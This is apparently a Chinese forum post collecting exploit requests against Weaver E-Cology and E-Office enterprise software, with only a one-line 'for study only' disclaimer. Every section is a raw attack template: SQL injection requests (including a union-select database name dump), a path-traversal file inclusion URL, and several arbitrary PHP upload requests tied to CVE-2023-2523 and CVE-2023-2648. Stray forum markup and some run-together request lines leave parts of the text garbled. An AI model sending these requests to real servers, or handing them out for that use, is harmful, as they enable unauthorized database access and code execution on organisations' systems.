|
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
泛微 E-Cology 某版本 SQL 注入漏洞
- POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
- Host: xxx.xxx.xxx.xxx:port
- User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
- Connection: close
- Content-Length: 189
- Content-Type: text/plain
- Accept-Encoding: gzip
- callCount=1
- page=
- httpSessionId=
- scriptSessionId=
- c0-scriptName=DocDwrUtil
- c0-methodName=ifNewsCheckOutByCurrentUser
- c0-id=0
- c0-param0=string:1 AND 1=1
- c0-param1=string:1
- batchId=0
复制代码
泛微 HrmCareerApplyPerView SQL 注入漏洞
- GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
- Host: 127.0.0.1:7443
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
- Accept-Encoding: gzip, deflate
- Connection: close
复制代码
泛微 ShowDocsImage SQL 注入漏洞
- GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
- like Gecko)
- Accept-Encoding: gzip, deflate
- Connection: close
复制代码
泛微 Weaver E-Office9 前台文件包含
- http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls
复制代码
泛微 E-Office uploadify.php 后台文件上传漏洞
上传文件所在路径:/attachment/3466744850/xxx.php
- POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
- Connection: close
- Content-Length: 259
- Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
- Accept-Encoding: gzip
- --e64bdf16c554bbc109cecef6451c26a4
- Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
- Content-Type: image/jpeg
- <?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>
- --e64bdf16c554bbc109cecef6451c26a4--
复制代码
泛微 E-Office9 文件上传漏洞 CVE-2023-2523
- POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
- Host:xxx.xxx.xxx.xxx:port
- Cache-Control:max-age=0
- Upgrade-Insecure-Requests:1
- Origin:null
- Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- Accept-Encoding:gzip, deflate
- Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
- Connection:close
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
- Content-Type:image/jpeg
- <?phpphpinfo();?>
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
复制代码
泛微 E-Office9 文件上传漏洞 CVE-2023-2648
- POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
- Host: 192.168.233.10:8082
- User-Agent: test
- Connection: close
- Content-Length: 493
- Accept-Encoding: gzip
- Content-Type: multipart/form-data
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- Content-Disposition: form-data; name="Filedata"; filename="666.php"
- Content-Type: application/octetstream
- <?php phpinfo();?>
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt[/h2]
- [h2]泛微 Weaver E-Office9.0 文件上传[/h2]
- [code]POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
- Host: xxx.xxx.xxx.xxx:port
- User-Agent: test
- Connection: close
- Content-Length: 493
- Accept-Encoding: gzip
- Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
- Content-Disposition: form-data; name="Filedata"; filename="666.php"
- Content-Type: application/octet-stream
- <?php phpinfo();?>
- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
- Content-Disposition: form-data; name="file"; filename=""
- Content-Type: application/octet-stream
- --25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
- POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
- Host: xxx.xxx.xxx.xxx:port
- User-Agent: test
- Connection: close
- Content-Length: 493
- Accept-Encoding: gzip
- Content-Type: multipart/form-data
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- Content-Disposition: form-data; name="Filedata"; filename="666.php"
- Content-Type: application/octet-stream
- <?php phpinfo();?>
- ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
复制代码
|
|